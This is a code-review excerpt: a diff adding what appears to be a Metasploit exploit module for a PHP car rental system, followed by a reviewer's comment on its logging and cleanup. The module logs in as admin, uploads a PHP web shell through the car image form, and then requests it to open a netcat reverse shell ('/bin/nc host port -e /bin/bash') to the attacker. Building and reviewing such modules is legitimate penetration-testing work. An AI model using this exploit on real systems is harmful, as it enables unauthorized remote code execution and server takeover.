modules/exploits/multi/php/car_rental_system.rb

```diff
@@ -0,0 +1,163 @@
+    ]
+  end
+
+  def inject_request(cookie)
+    host = datastore['LHOST']
+    port = datastore['LPORT']
+    fname = 'sh_ell.php'
+    php = "<?php \n"
+    php << "echo system('/bin/nc #{host} #{port} -e /bin/bash');\n"
+    php << "?>\n"
+    data = Rex::MIME::Message.new
+    data.add_part('0', nil, nil, 'form-data; name="price"')
+    data.add_part('Hacked', nil, nil, 'form-data; name="model"')
+    data.add_part('2', nil, nil, 'form-data; name="transmission_id"')
+    data.add_part('hacked', nil, nil, 'form-data; name="description"')
+    data.add_part('1', nil, nil, 'form-data; name="engine_id"')
+    data.add_part('A', nil, nil, 'form-data; name="brand"')
+    data.add_part('3', nil, nil, 'form-data; name="category_id"')
+    data.add_part('', nil, nil, 'form-data; name="id"')
+    data.add_part('0', nil, nil, 'form-data; name="qty"')
+    data.add_part(php, 'application/x-php', nil, "form-data; name=\"img\"; filename=\"#{fname}\"")
+    data_post = data.to_s
+    send_request_cgi({
+      'method' => 'POST',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php?action=save_car'),
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => data_post
+    })
+  end
+
+  def get_id(cookie)
+    send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', 'index.php?page=cars')
+    })
+    data_id = res.body.to_s.index('data-id=')
+    toreturn = res.body.to_s[data_id + 9, 3]
+    toreturn = toreturn.sub!('"', '')
+    return toreturn.sub!(' ', '')
+  end
+
+  def run_shell(did, cookie)
+    enduri = 'index.php?page=manage_car&id=' + did.to_s
+    print_status(enduri)
+    send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', enduri)
+    })
+
+    # print(normalize_uri(target_uri.path, 'admin', 'index.php?page=manage_car&id='+(did)))
+    str = res.body.to_s
+    idx = str.index('assets/uploads/cars_img')
+    toreturn = str[idx, 45]
+    print_status(toreturn)
+    send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'admin', toreturn)
+    })
+    # return
+
+  end
+
+  def login
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php?action=login'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }
+    })
+    return res.get_cookies
+  end
+
+  def exploit
+    print_status('Attempting Login')
+    cookie = login
+    print_status('Cookie: ' + cookie)
+    print_status('Creating new car')
+    inject_request(cookie)
+    did = get_id(cookie)
+    print_status('Last Images inserted id=' + did)
+    run_shell(did, cookie)
+    print_status('Cleaning env')
+
+    print_status('Send a command to test')
+
```

Comment:
Why print out that your cleaning the environment when you don't end up actually doing anything at this stage? If you wanted to remove the file from the target after your sessions you could call `register_file_for_cleanup(<location on disk of the uploaded shell>)`.

Also the second output `Send a command to test` is not helpful for connecting to the shell and once you end up using `payload.encoded` the framework should automatically connect to the shell anyway so this line doesn't make much sense in that context.